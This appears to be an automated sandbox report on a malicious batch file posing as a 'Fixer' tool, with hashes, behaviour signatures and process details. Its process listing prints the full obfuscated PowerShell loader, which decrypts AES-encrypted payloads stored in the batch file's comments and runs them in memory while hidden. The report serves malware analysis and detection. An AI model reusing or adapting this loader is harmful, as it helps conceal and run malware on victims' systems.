Analysis
-
max time kernel
2581s -
max time network
2283s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
12-11-2024 06:31
Static task
static1
Behavioral task
behavioral1
Sample
NLHybrid Fixer NEW.bat
Resource
win7-20241023-en
windows7-x64
4 signatures
1800 seconds
Behavioral task
behavioral2
Sample
NLHybrid Fixer NEW.bat
Resource
win10v2004-20241007-en
windows10-2004-x64
19 signatures
1800 seconds
General
-
Target
NLHybrid Fixer NEW.bat
-
Size
291KB
-
MD5
1fea40d9d1f41390edb7d9e52c4b33bf
-
SHA1
e125f47d3575a28b507855c0c9a57b030a45d9a3
-
SHA256
6f034eb0b11a9b60901ee3a5f1329ab44bec65519b178ee16d39b40ccad6d2f8
-
SHA512
084d39f3f6edff152d35edec85a2795bef66cc30a98cfb89ba4b12bfec3ccaf1f3b97cf968245a41b76a0ff5bc0bf4f242b9937dbf3a6addaad41005cac0ce39
-
SSDEEP
6144:0IA1KNGYo86ChkxOZyt7dTEe4dFVBOovjL+/MDYwbwGpxsB:0IAZYx6CnZyBhKdFOorJhl+
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1212 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1212 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1212 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2584 wrote to memory of 1212 2584 cmd.exe 31 PID 2584 wrote to memory of 1212 2584 cmd.exe 31 PID 2584 wrote to memory of 1212 2584 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer NEW.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/MG2yzBsbBxe5ojiX7EsFzCMNzEMTu/JvAdNvRWbX7w='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RdyxlHFLWFg7quo490rAog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EZwTl=New-Object System.IO.MemoryStream(,$param_var); $GfwYq=New-Object System.IO.MemoryStream; $womrn=New-Object System.IO.Compression.GZipStream($EZwTl, [IO.Compression.CompressionMode]::Decompress); $womrn.CopyTo($GfwYq); $womrn.Dispose(); $EZwTl.Dispose(); $GfwYq.Dispose(); $GfwYq.ToArray();}function execute_function($param_var,$param2_var){ $vyNht=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $HvyAI=$vyNht.EntryPoint; $HvyAI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer NEW.bat';$ugiUZ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\NLHybrid Fixer NEW.bat').Split([Environment]::NewLine);foreach ($jBnrL in $ugiUZ) { if ($jBnrL.StartsWith(':: ')) { $PDvIC=$jBnrL.Substring(3); break; }}$payloads_var=[string[]]$PDvIC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1212
-